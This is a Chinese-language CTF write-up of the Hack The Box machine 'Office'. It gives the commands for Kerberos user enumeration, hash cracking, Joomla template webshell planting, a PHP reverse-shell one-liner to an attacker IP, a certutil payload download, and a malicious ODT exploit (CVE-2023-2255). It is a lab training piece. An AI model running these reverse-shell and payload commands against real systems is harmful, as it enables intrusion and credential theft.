跟着大佬学渗透之高级篇04

前言

今天的靶机依然是HTB(Hack The Box)的靶机--Office，这也是一台hard难度的靶机，这个靶机获取shell的过程还是非常绕的，并且也没有完成提权，总体感觉难度还是很高的，感兴趣的大佬一定要去试试。

开干：

1、环境准备

• HTB的靶机

2、扫描开放端口

nmap命令扫描开放端口

3、寻找漏洞尝试利用

可以看到80端口中robots.txt提到了一些目录

尝试访问这些目录

在/administrator/ 目录发现一个joomla服务。google一下，发现这个组件存在一个信息泄露漏洞

直接访问信息泄露的路径

发现了用户root，密码是H0lOgrams4reTakIng0Ver754!

尝试用这组用户名密码去登录，不出意料的没有成功，windows靶机，用户名是root就怪怪的，因为这个密码还是很像用户的密码的，接下来就用kerbrute去收集域内用户名，命令如下：

./kerbrute userenum --dc 10.129.xxx.xxx -d office.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

将爆破到的用户名写入user.txt

尝试用这些用户名和密码H0lOgrams4reTakIng0Ver754! 去登录也没有成功，因为靶机还开启了smb服务，接下来就尝试用这些用户名，连接smb服务

可以用用户dwolfe，密码H0lOgrams4reTakIng0Ver754! 连接到smb服务

在SOC Analysis目录底下发现一个pcap文件。

下载到本地后，用wireshark打开该pcap文件，搜索http.request，看看http请求

看看https请求

都没有什么发现，一直往下拖，发现了KRB5认证的一些流量

google下，发现可以从Kerberos验证数据包中获取密码，链接如下：https://vbscrub.com/2020/02/27/getting-passwords-from-kerberos-pre-authentication-packets/

按照该文章的描述构造一串hash

使用hashcat进行爆破

hashcat -m 19900 -a 0 hash.txt rockyou.txt

得到明文密码：playboy69

用之前kerbrute枚举的用户名加密码playboy69登录该靶机，并未成功，接下来想到去登录80页面的joomla服务，最终用 用户名administrator，密码 playboy69登录成功。

进入joomla后台是可以修改模板的，这边选择修改一个error.php，将原来error.php替换为一个webshell.php

访问修改后模板的路径 /templates/cassiopeia/error.php

执行php 反弹shell命令

php -r '$sock=fsockopen("10.10.14.31",7777);popen("cmd <&3 >&3 2>&3", "r");'

并没有反弹成功，接下来上传一个nc64.exe，用nc反弹shell

这样就拿到了web_account用户的shell

读取用户flag时候发现，该用户目录底下没有flag文件

查看其他用户

发现几个其他用户，按照HTB的打靶套路，是需要平移到其他用户的。接下来上传winpeas.exe，搜寻一些有助于用户平移的信息。

执行到一半报错了，本地也未发现有助于用户平移的文件。接下来想到能否直接用playboy69这个密码去切换用户呢，下载RunaCs工具：

wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip

执行runasCs 切换用户

成功切换到了用户tstark，查看该用户目录底下的flag文件

4、提权

查看是否可以土豆提权

不能用土豆，这个用户执行winpeas也会报错，也未发现什么有助于提权的文件，接下来就查看下这个用户本地起了哪些服务

上传chisel，尝试去访问这个用户的本地服务

certutil.exe -urlcache -split -f http://10.10.14.31/chisel.exe

kali

靶机

访问kali的8083端口，发现有个web服务。

点击“Submit Application” 发现了一个文件上传功能

尝试上传一个webshell

可以发现上传的文件类型还是有限制的，只允许上传doc、docx、docm、odt文件，odt文件之前没见过，google后发现存在一个漏，可以构造恶意的odt文件去执行命令。

https://github.com/elweth-sec/CVE-2023-2255

先生成一个恶意odt文件，去执行C:UsersPublic目录底下的reverse.exe

msfvenom生成反弹shell的exe

靶机下载该文件，放到目录C:UsersPublic 下

web页面上传恶意odt文件

可以发现平移到了另一个用户

平移到ppotts用户后，也不能用土豆提权，执行winpeas后也会报错，本地也没有什么有用的文件，也没发现什么可以利用的服务，打到这里就没什么思路了。。。

按照HTB靶机的一贯思路，肯定还是要平移到另一个用户上进行提权，感兴趣的大佬可以去尝试尝试。

5、总结

我感觉这个靶机拿到user权限还是比较绕的，很符合HTB困难靶机的特点，80端口组件信息泄露发现一个密码，kerbrute枚举用户名登录smb，共享文件里面发现了另一个密码，登录joomla之后rce拿shell。

提权部分没啥思路，感兴趣的大佬去尝试尝试吧。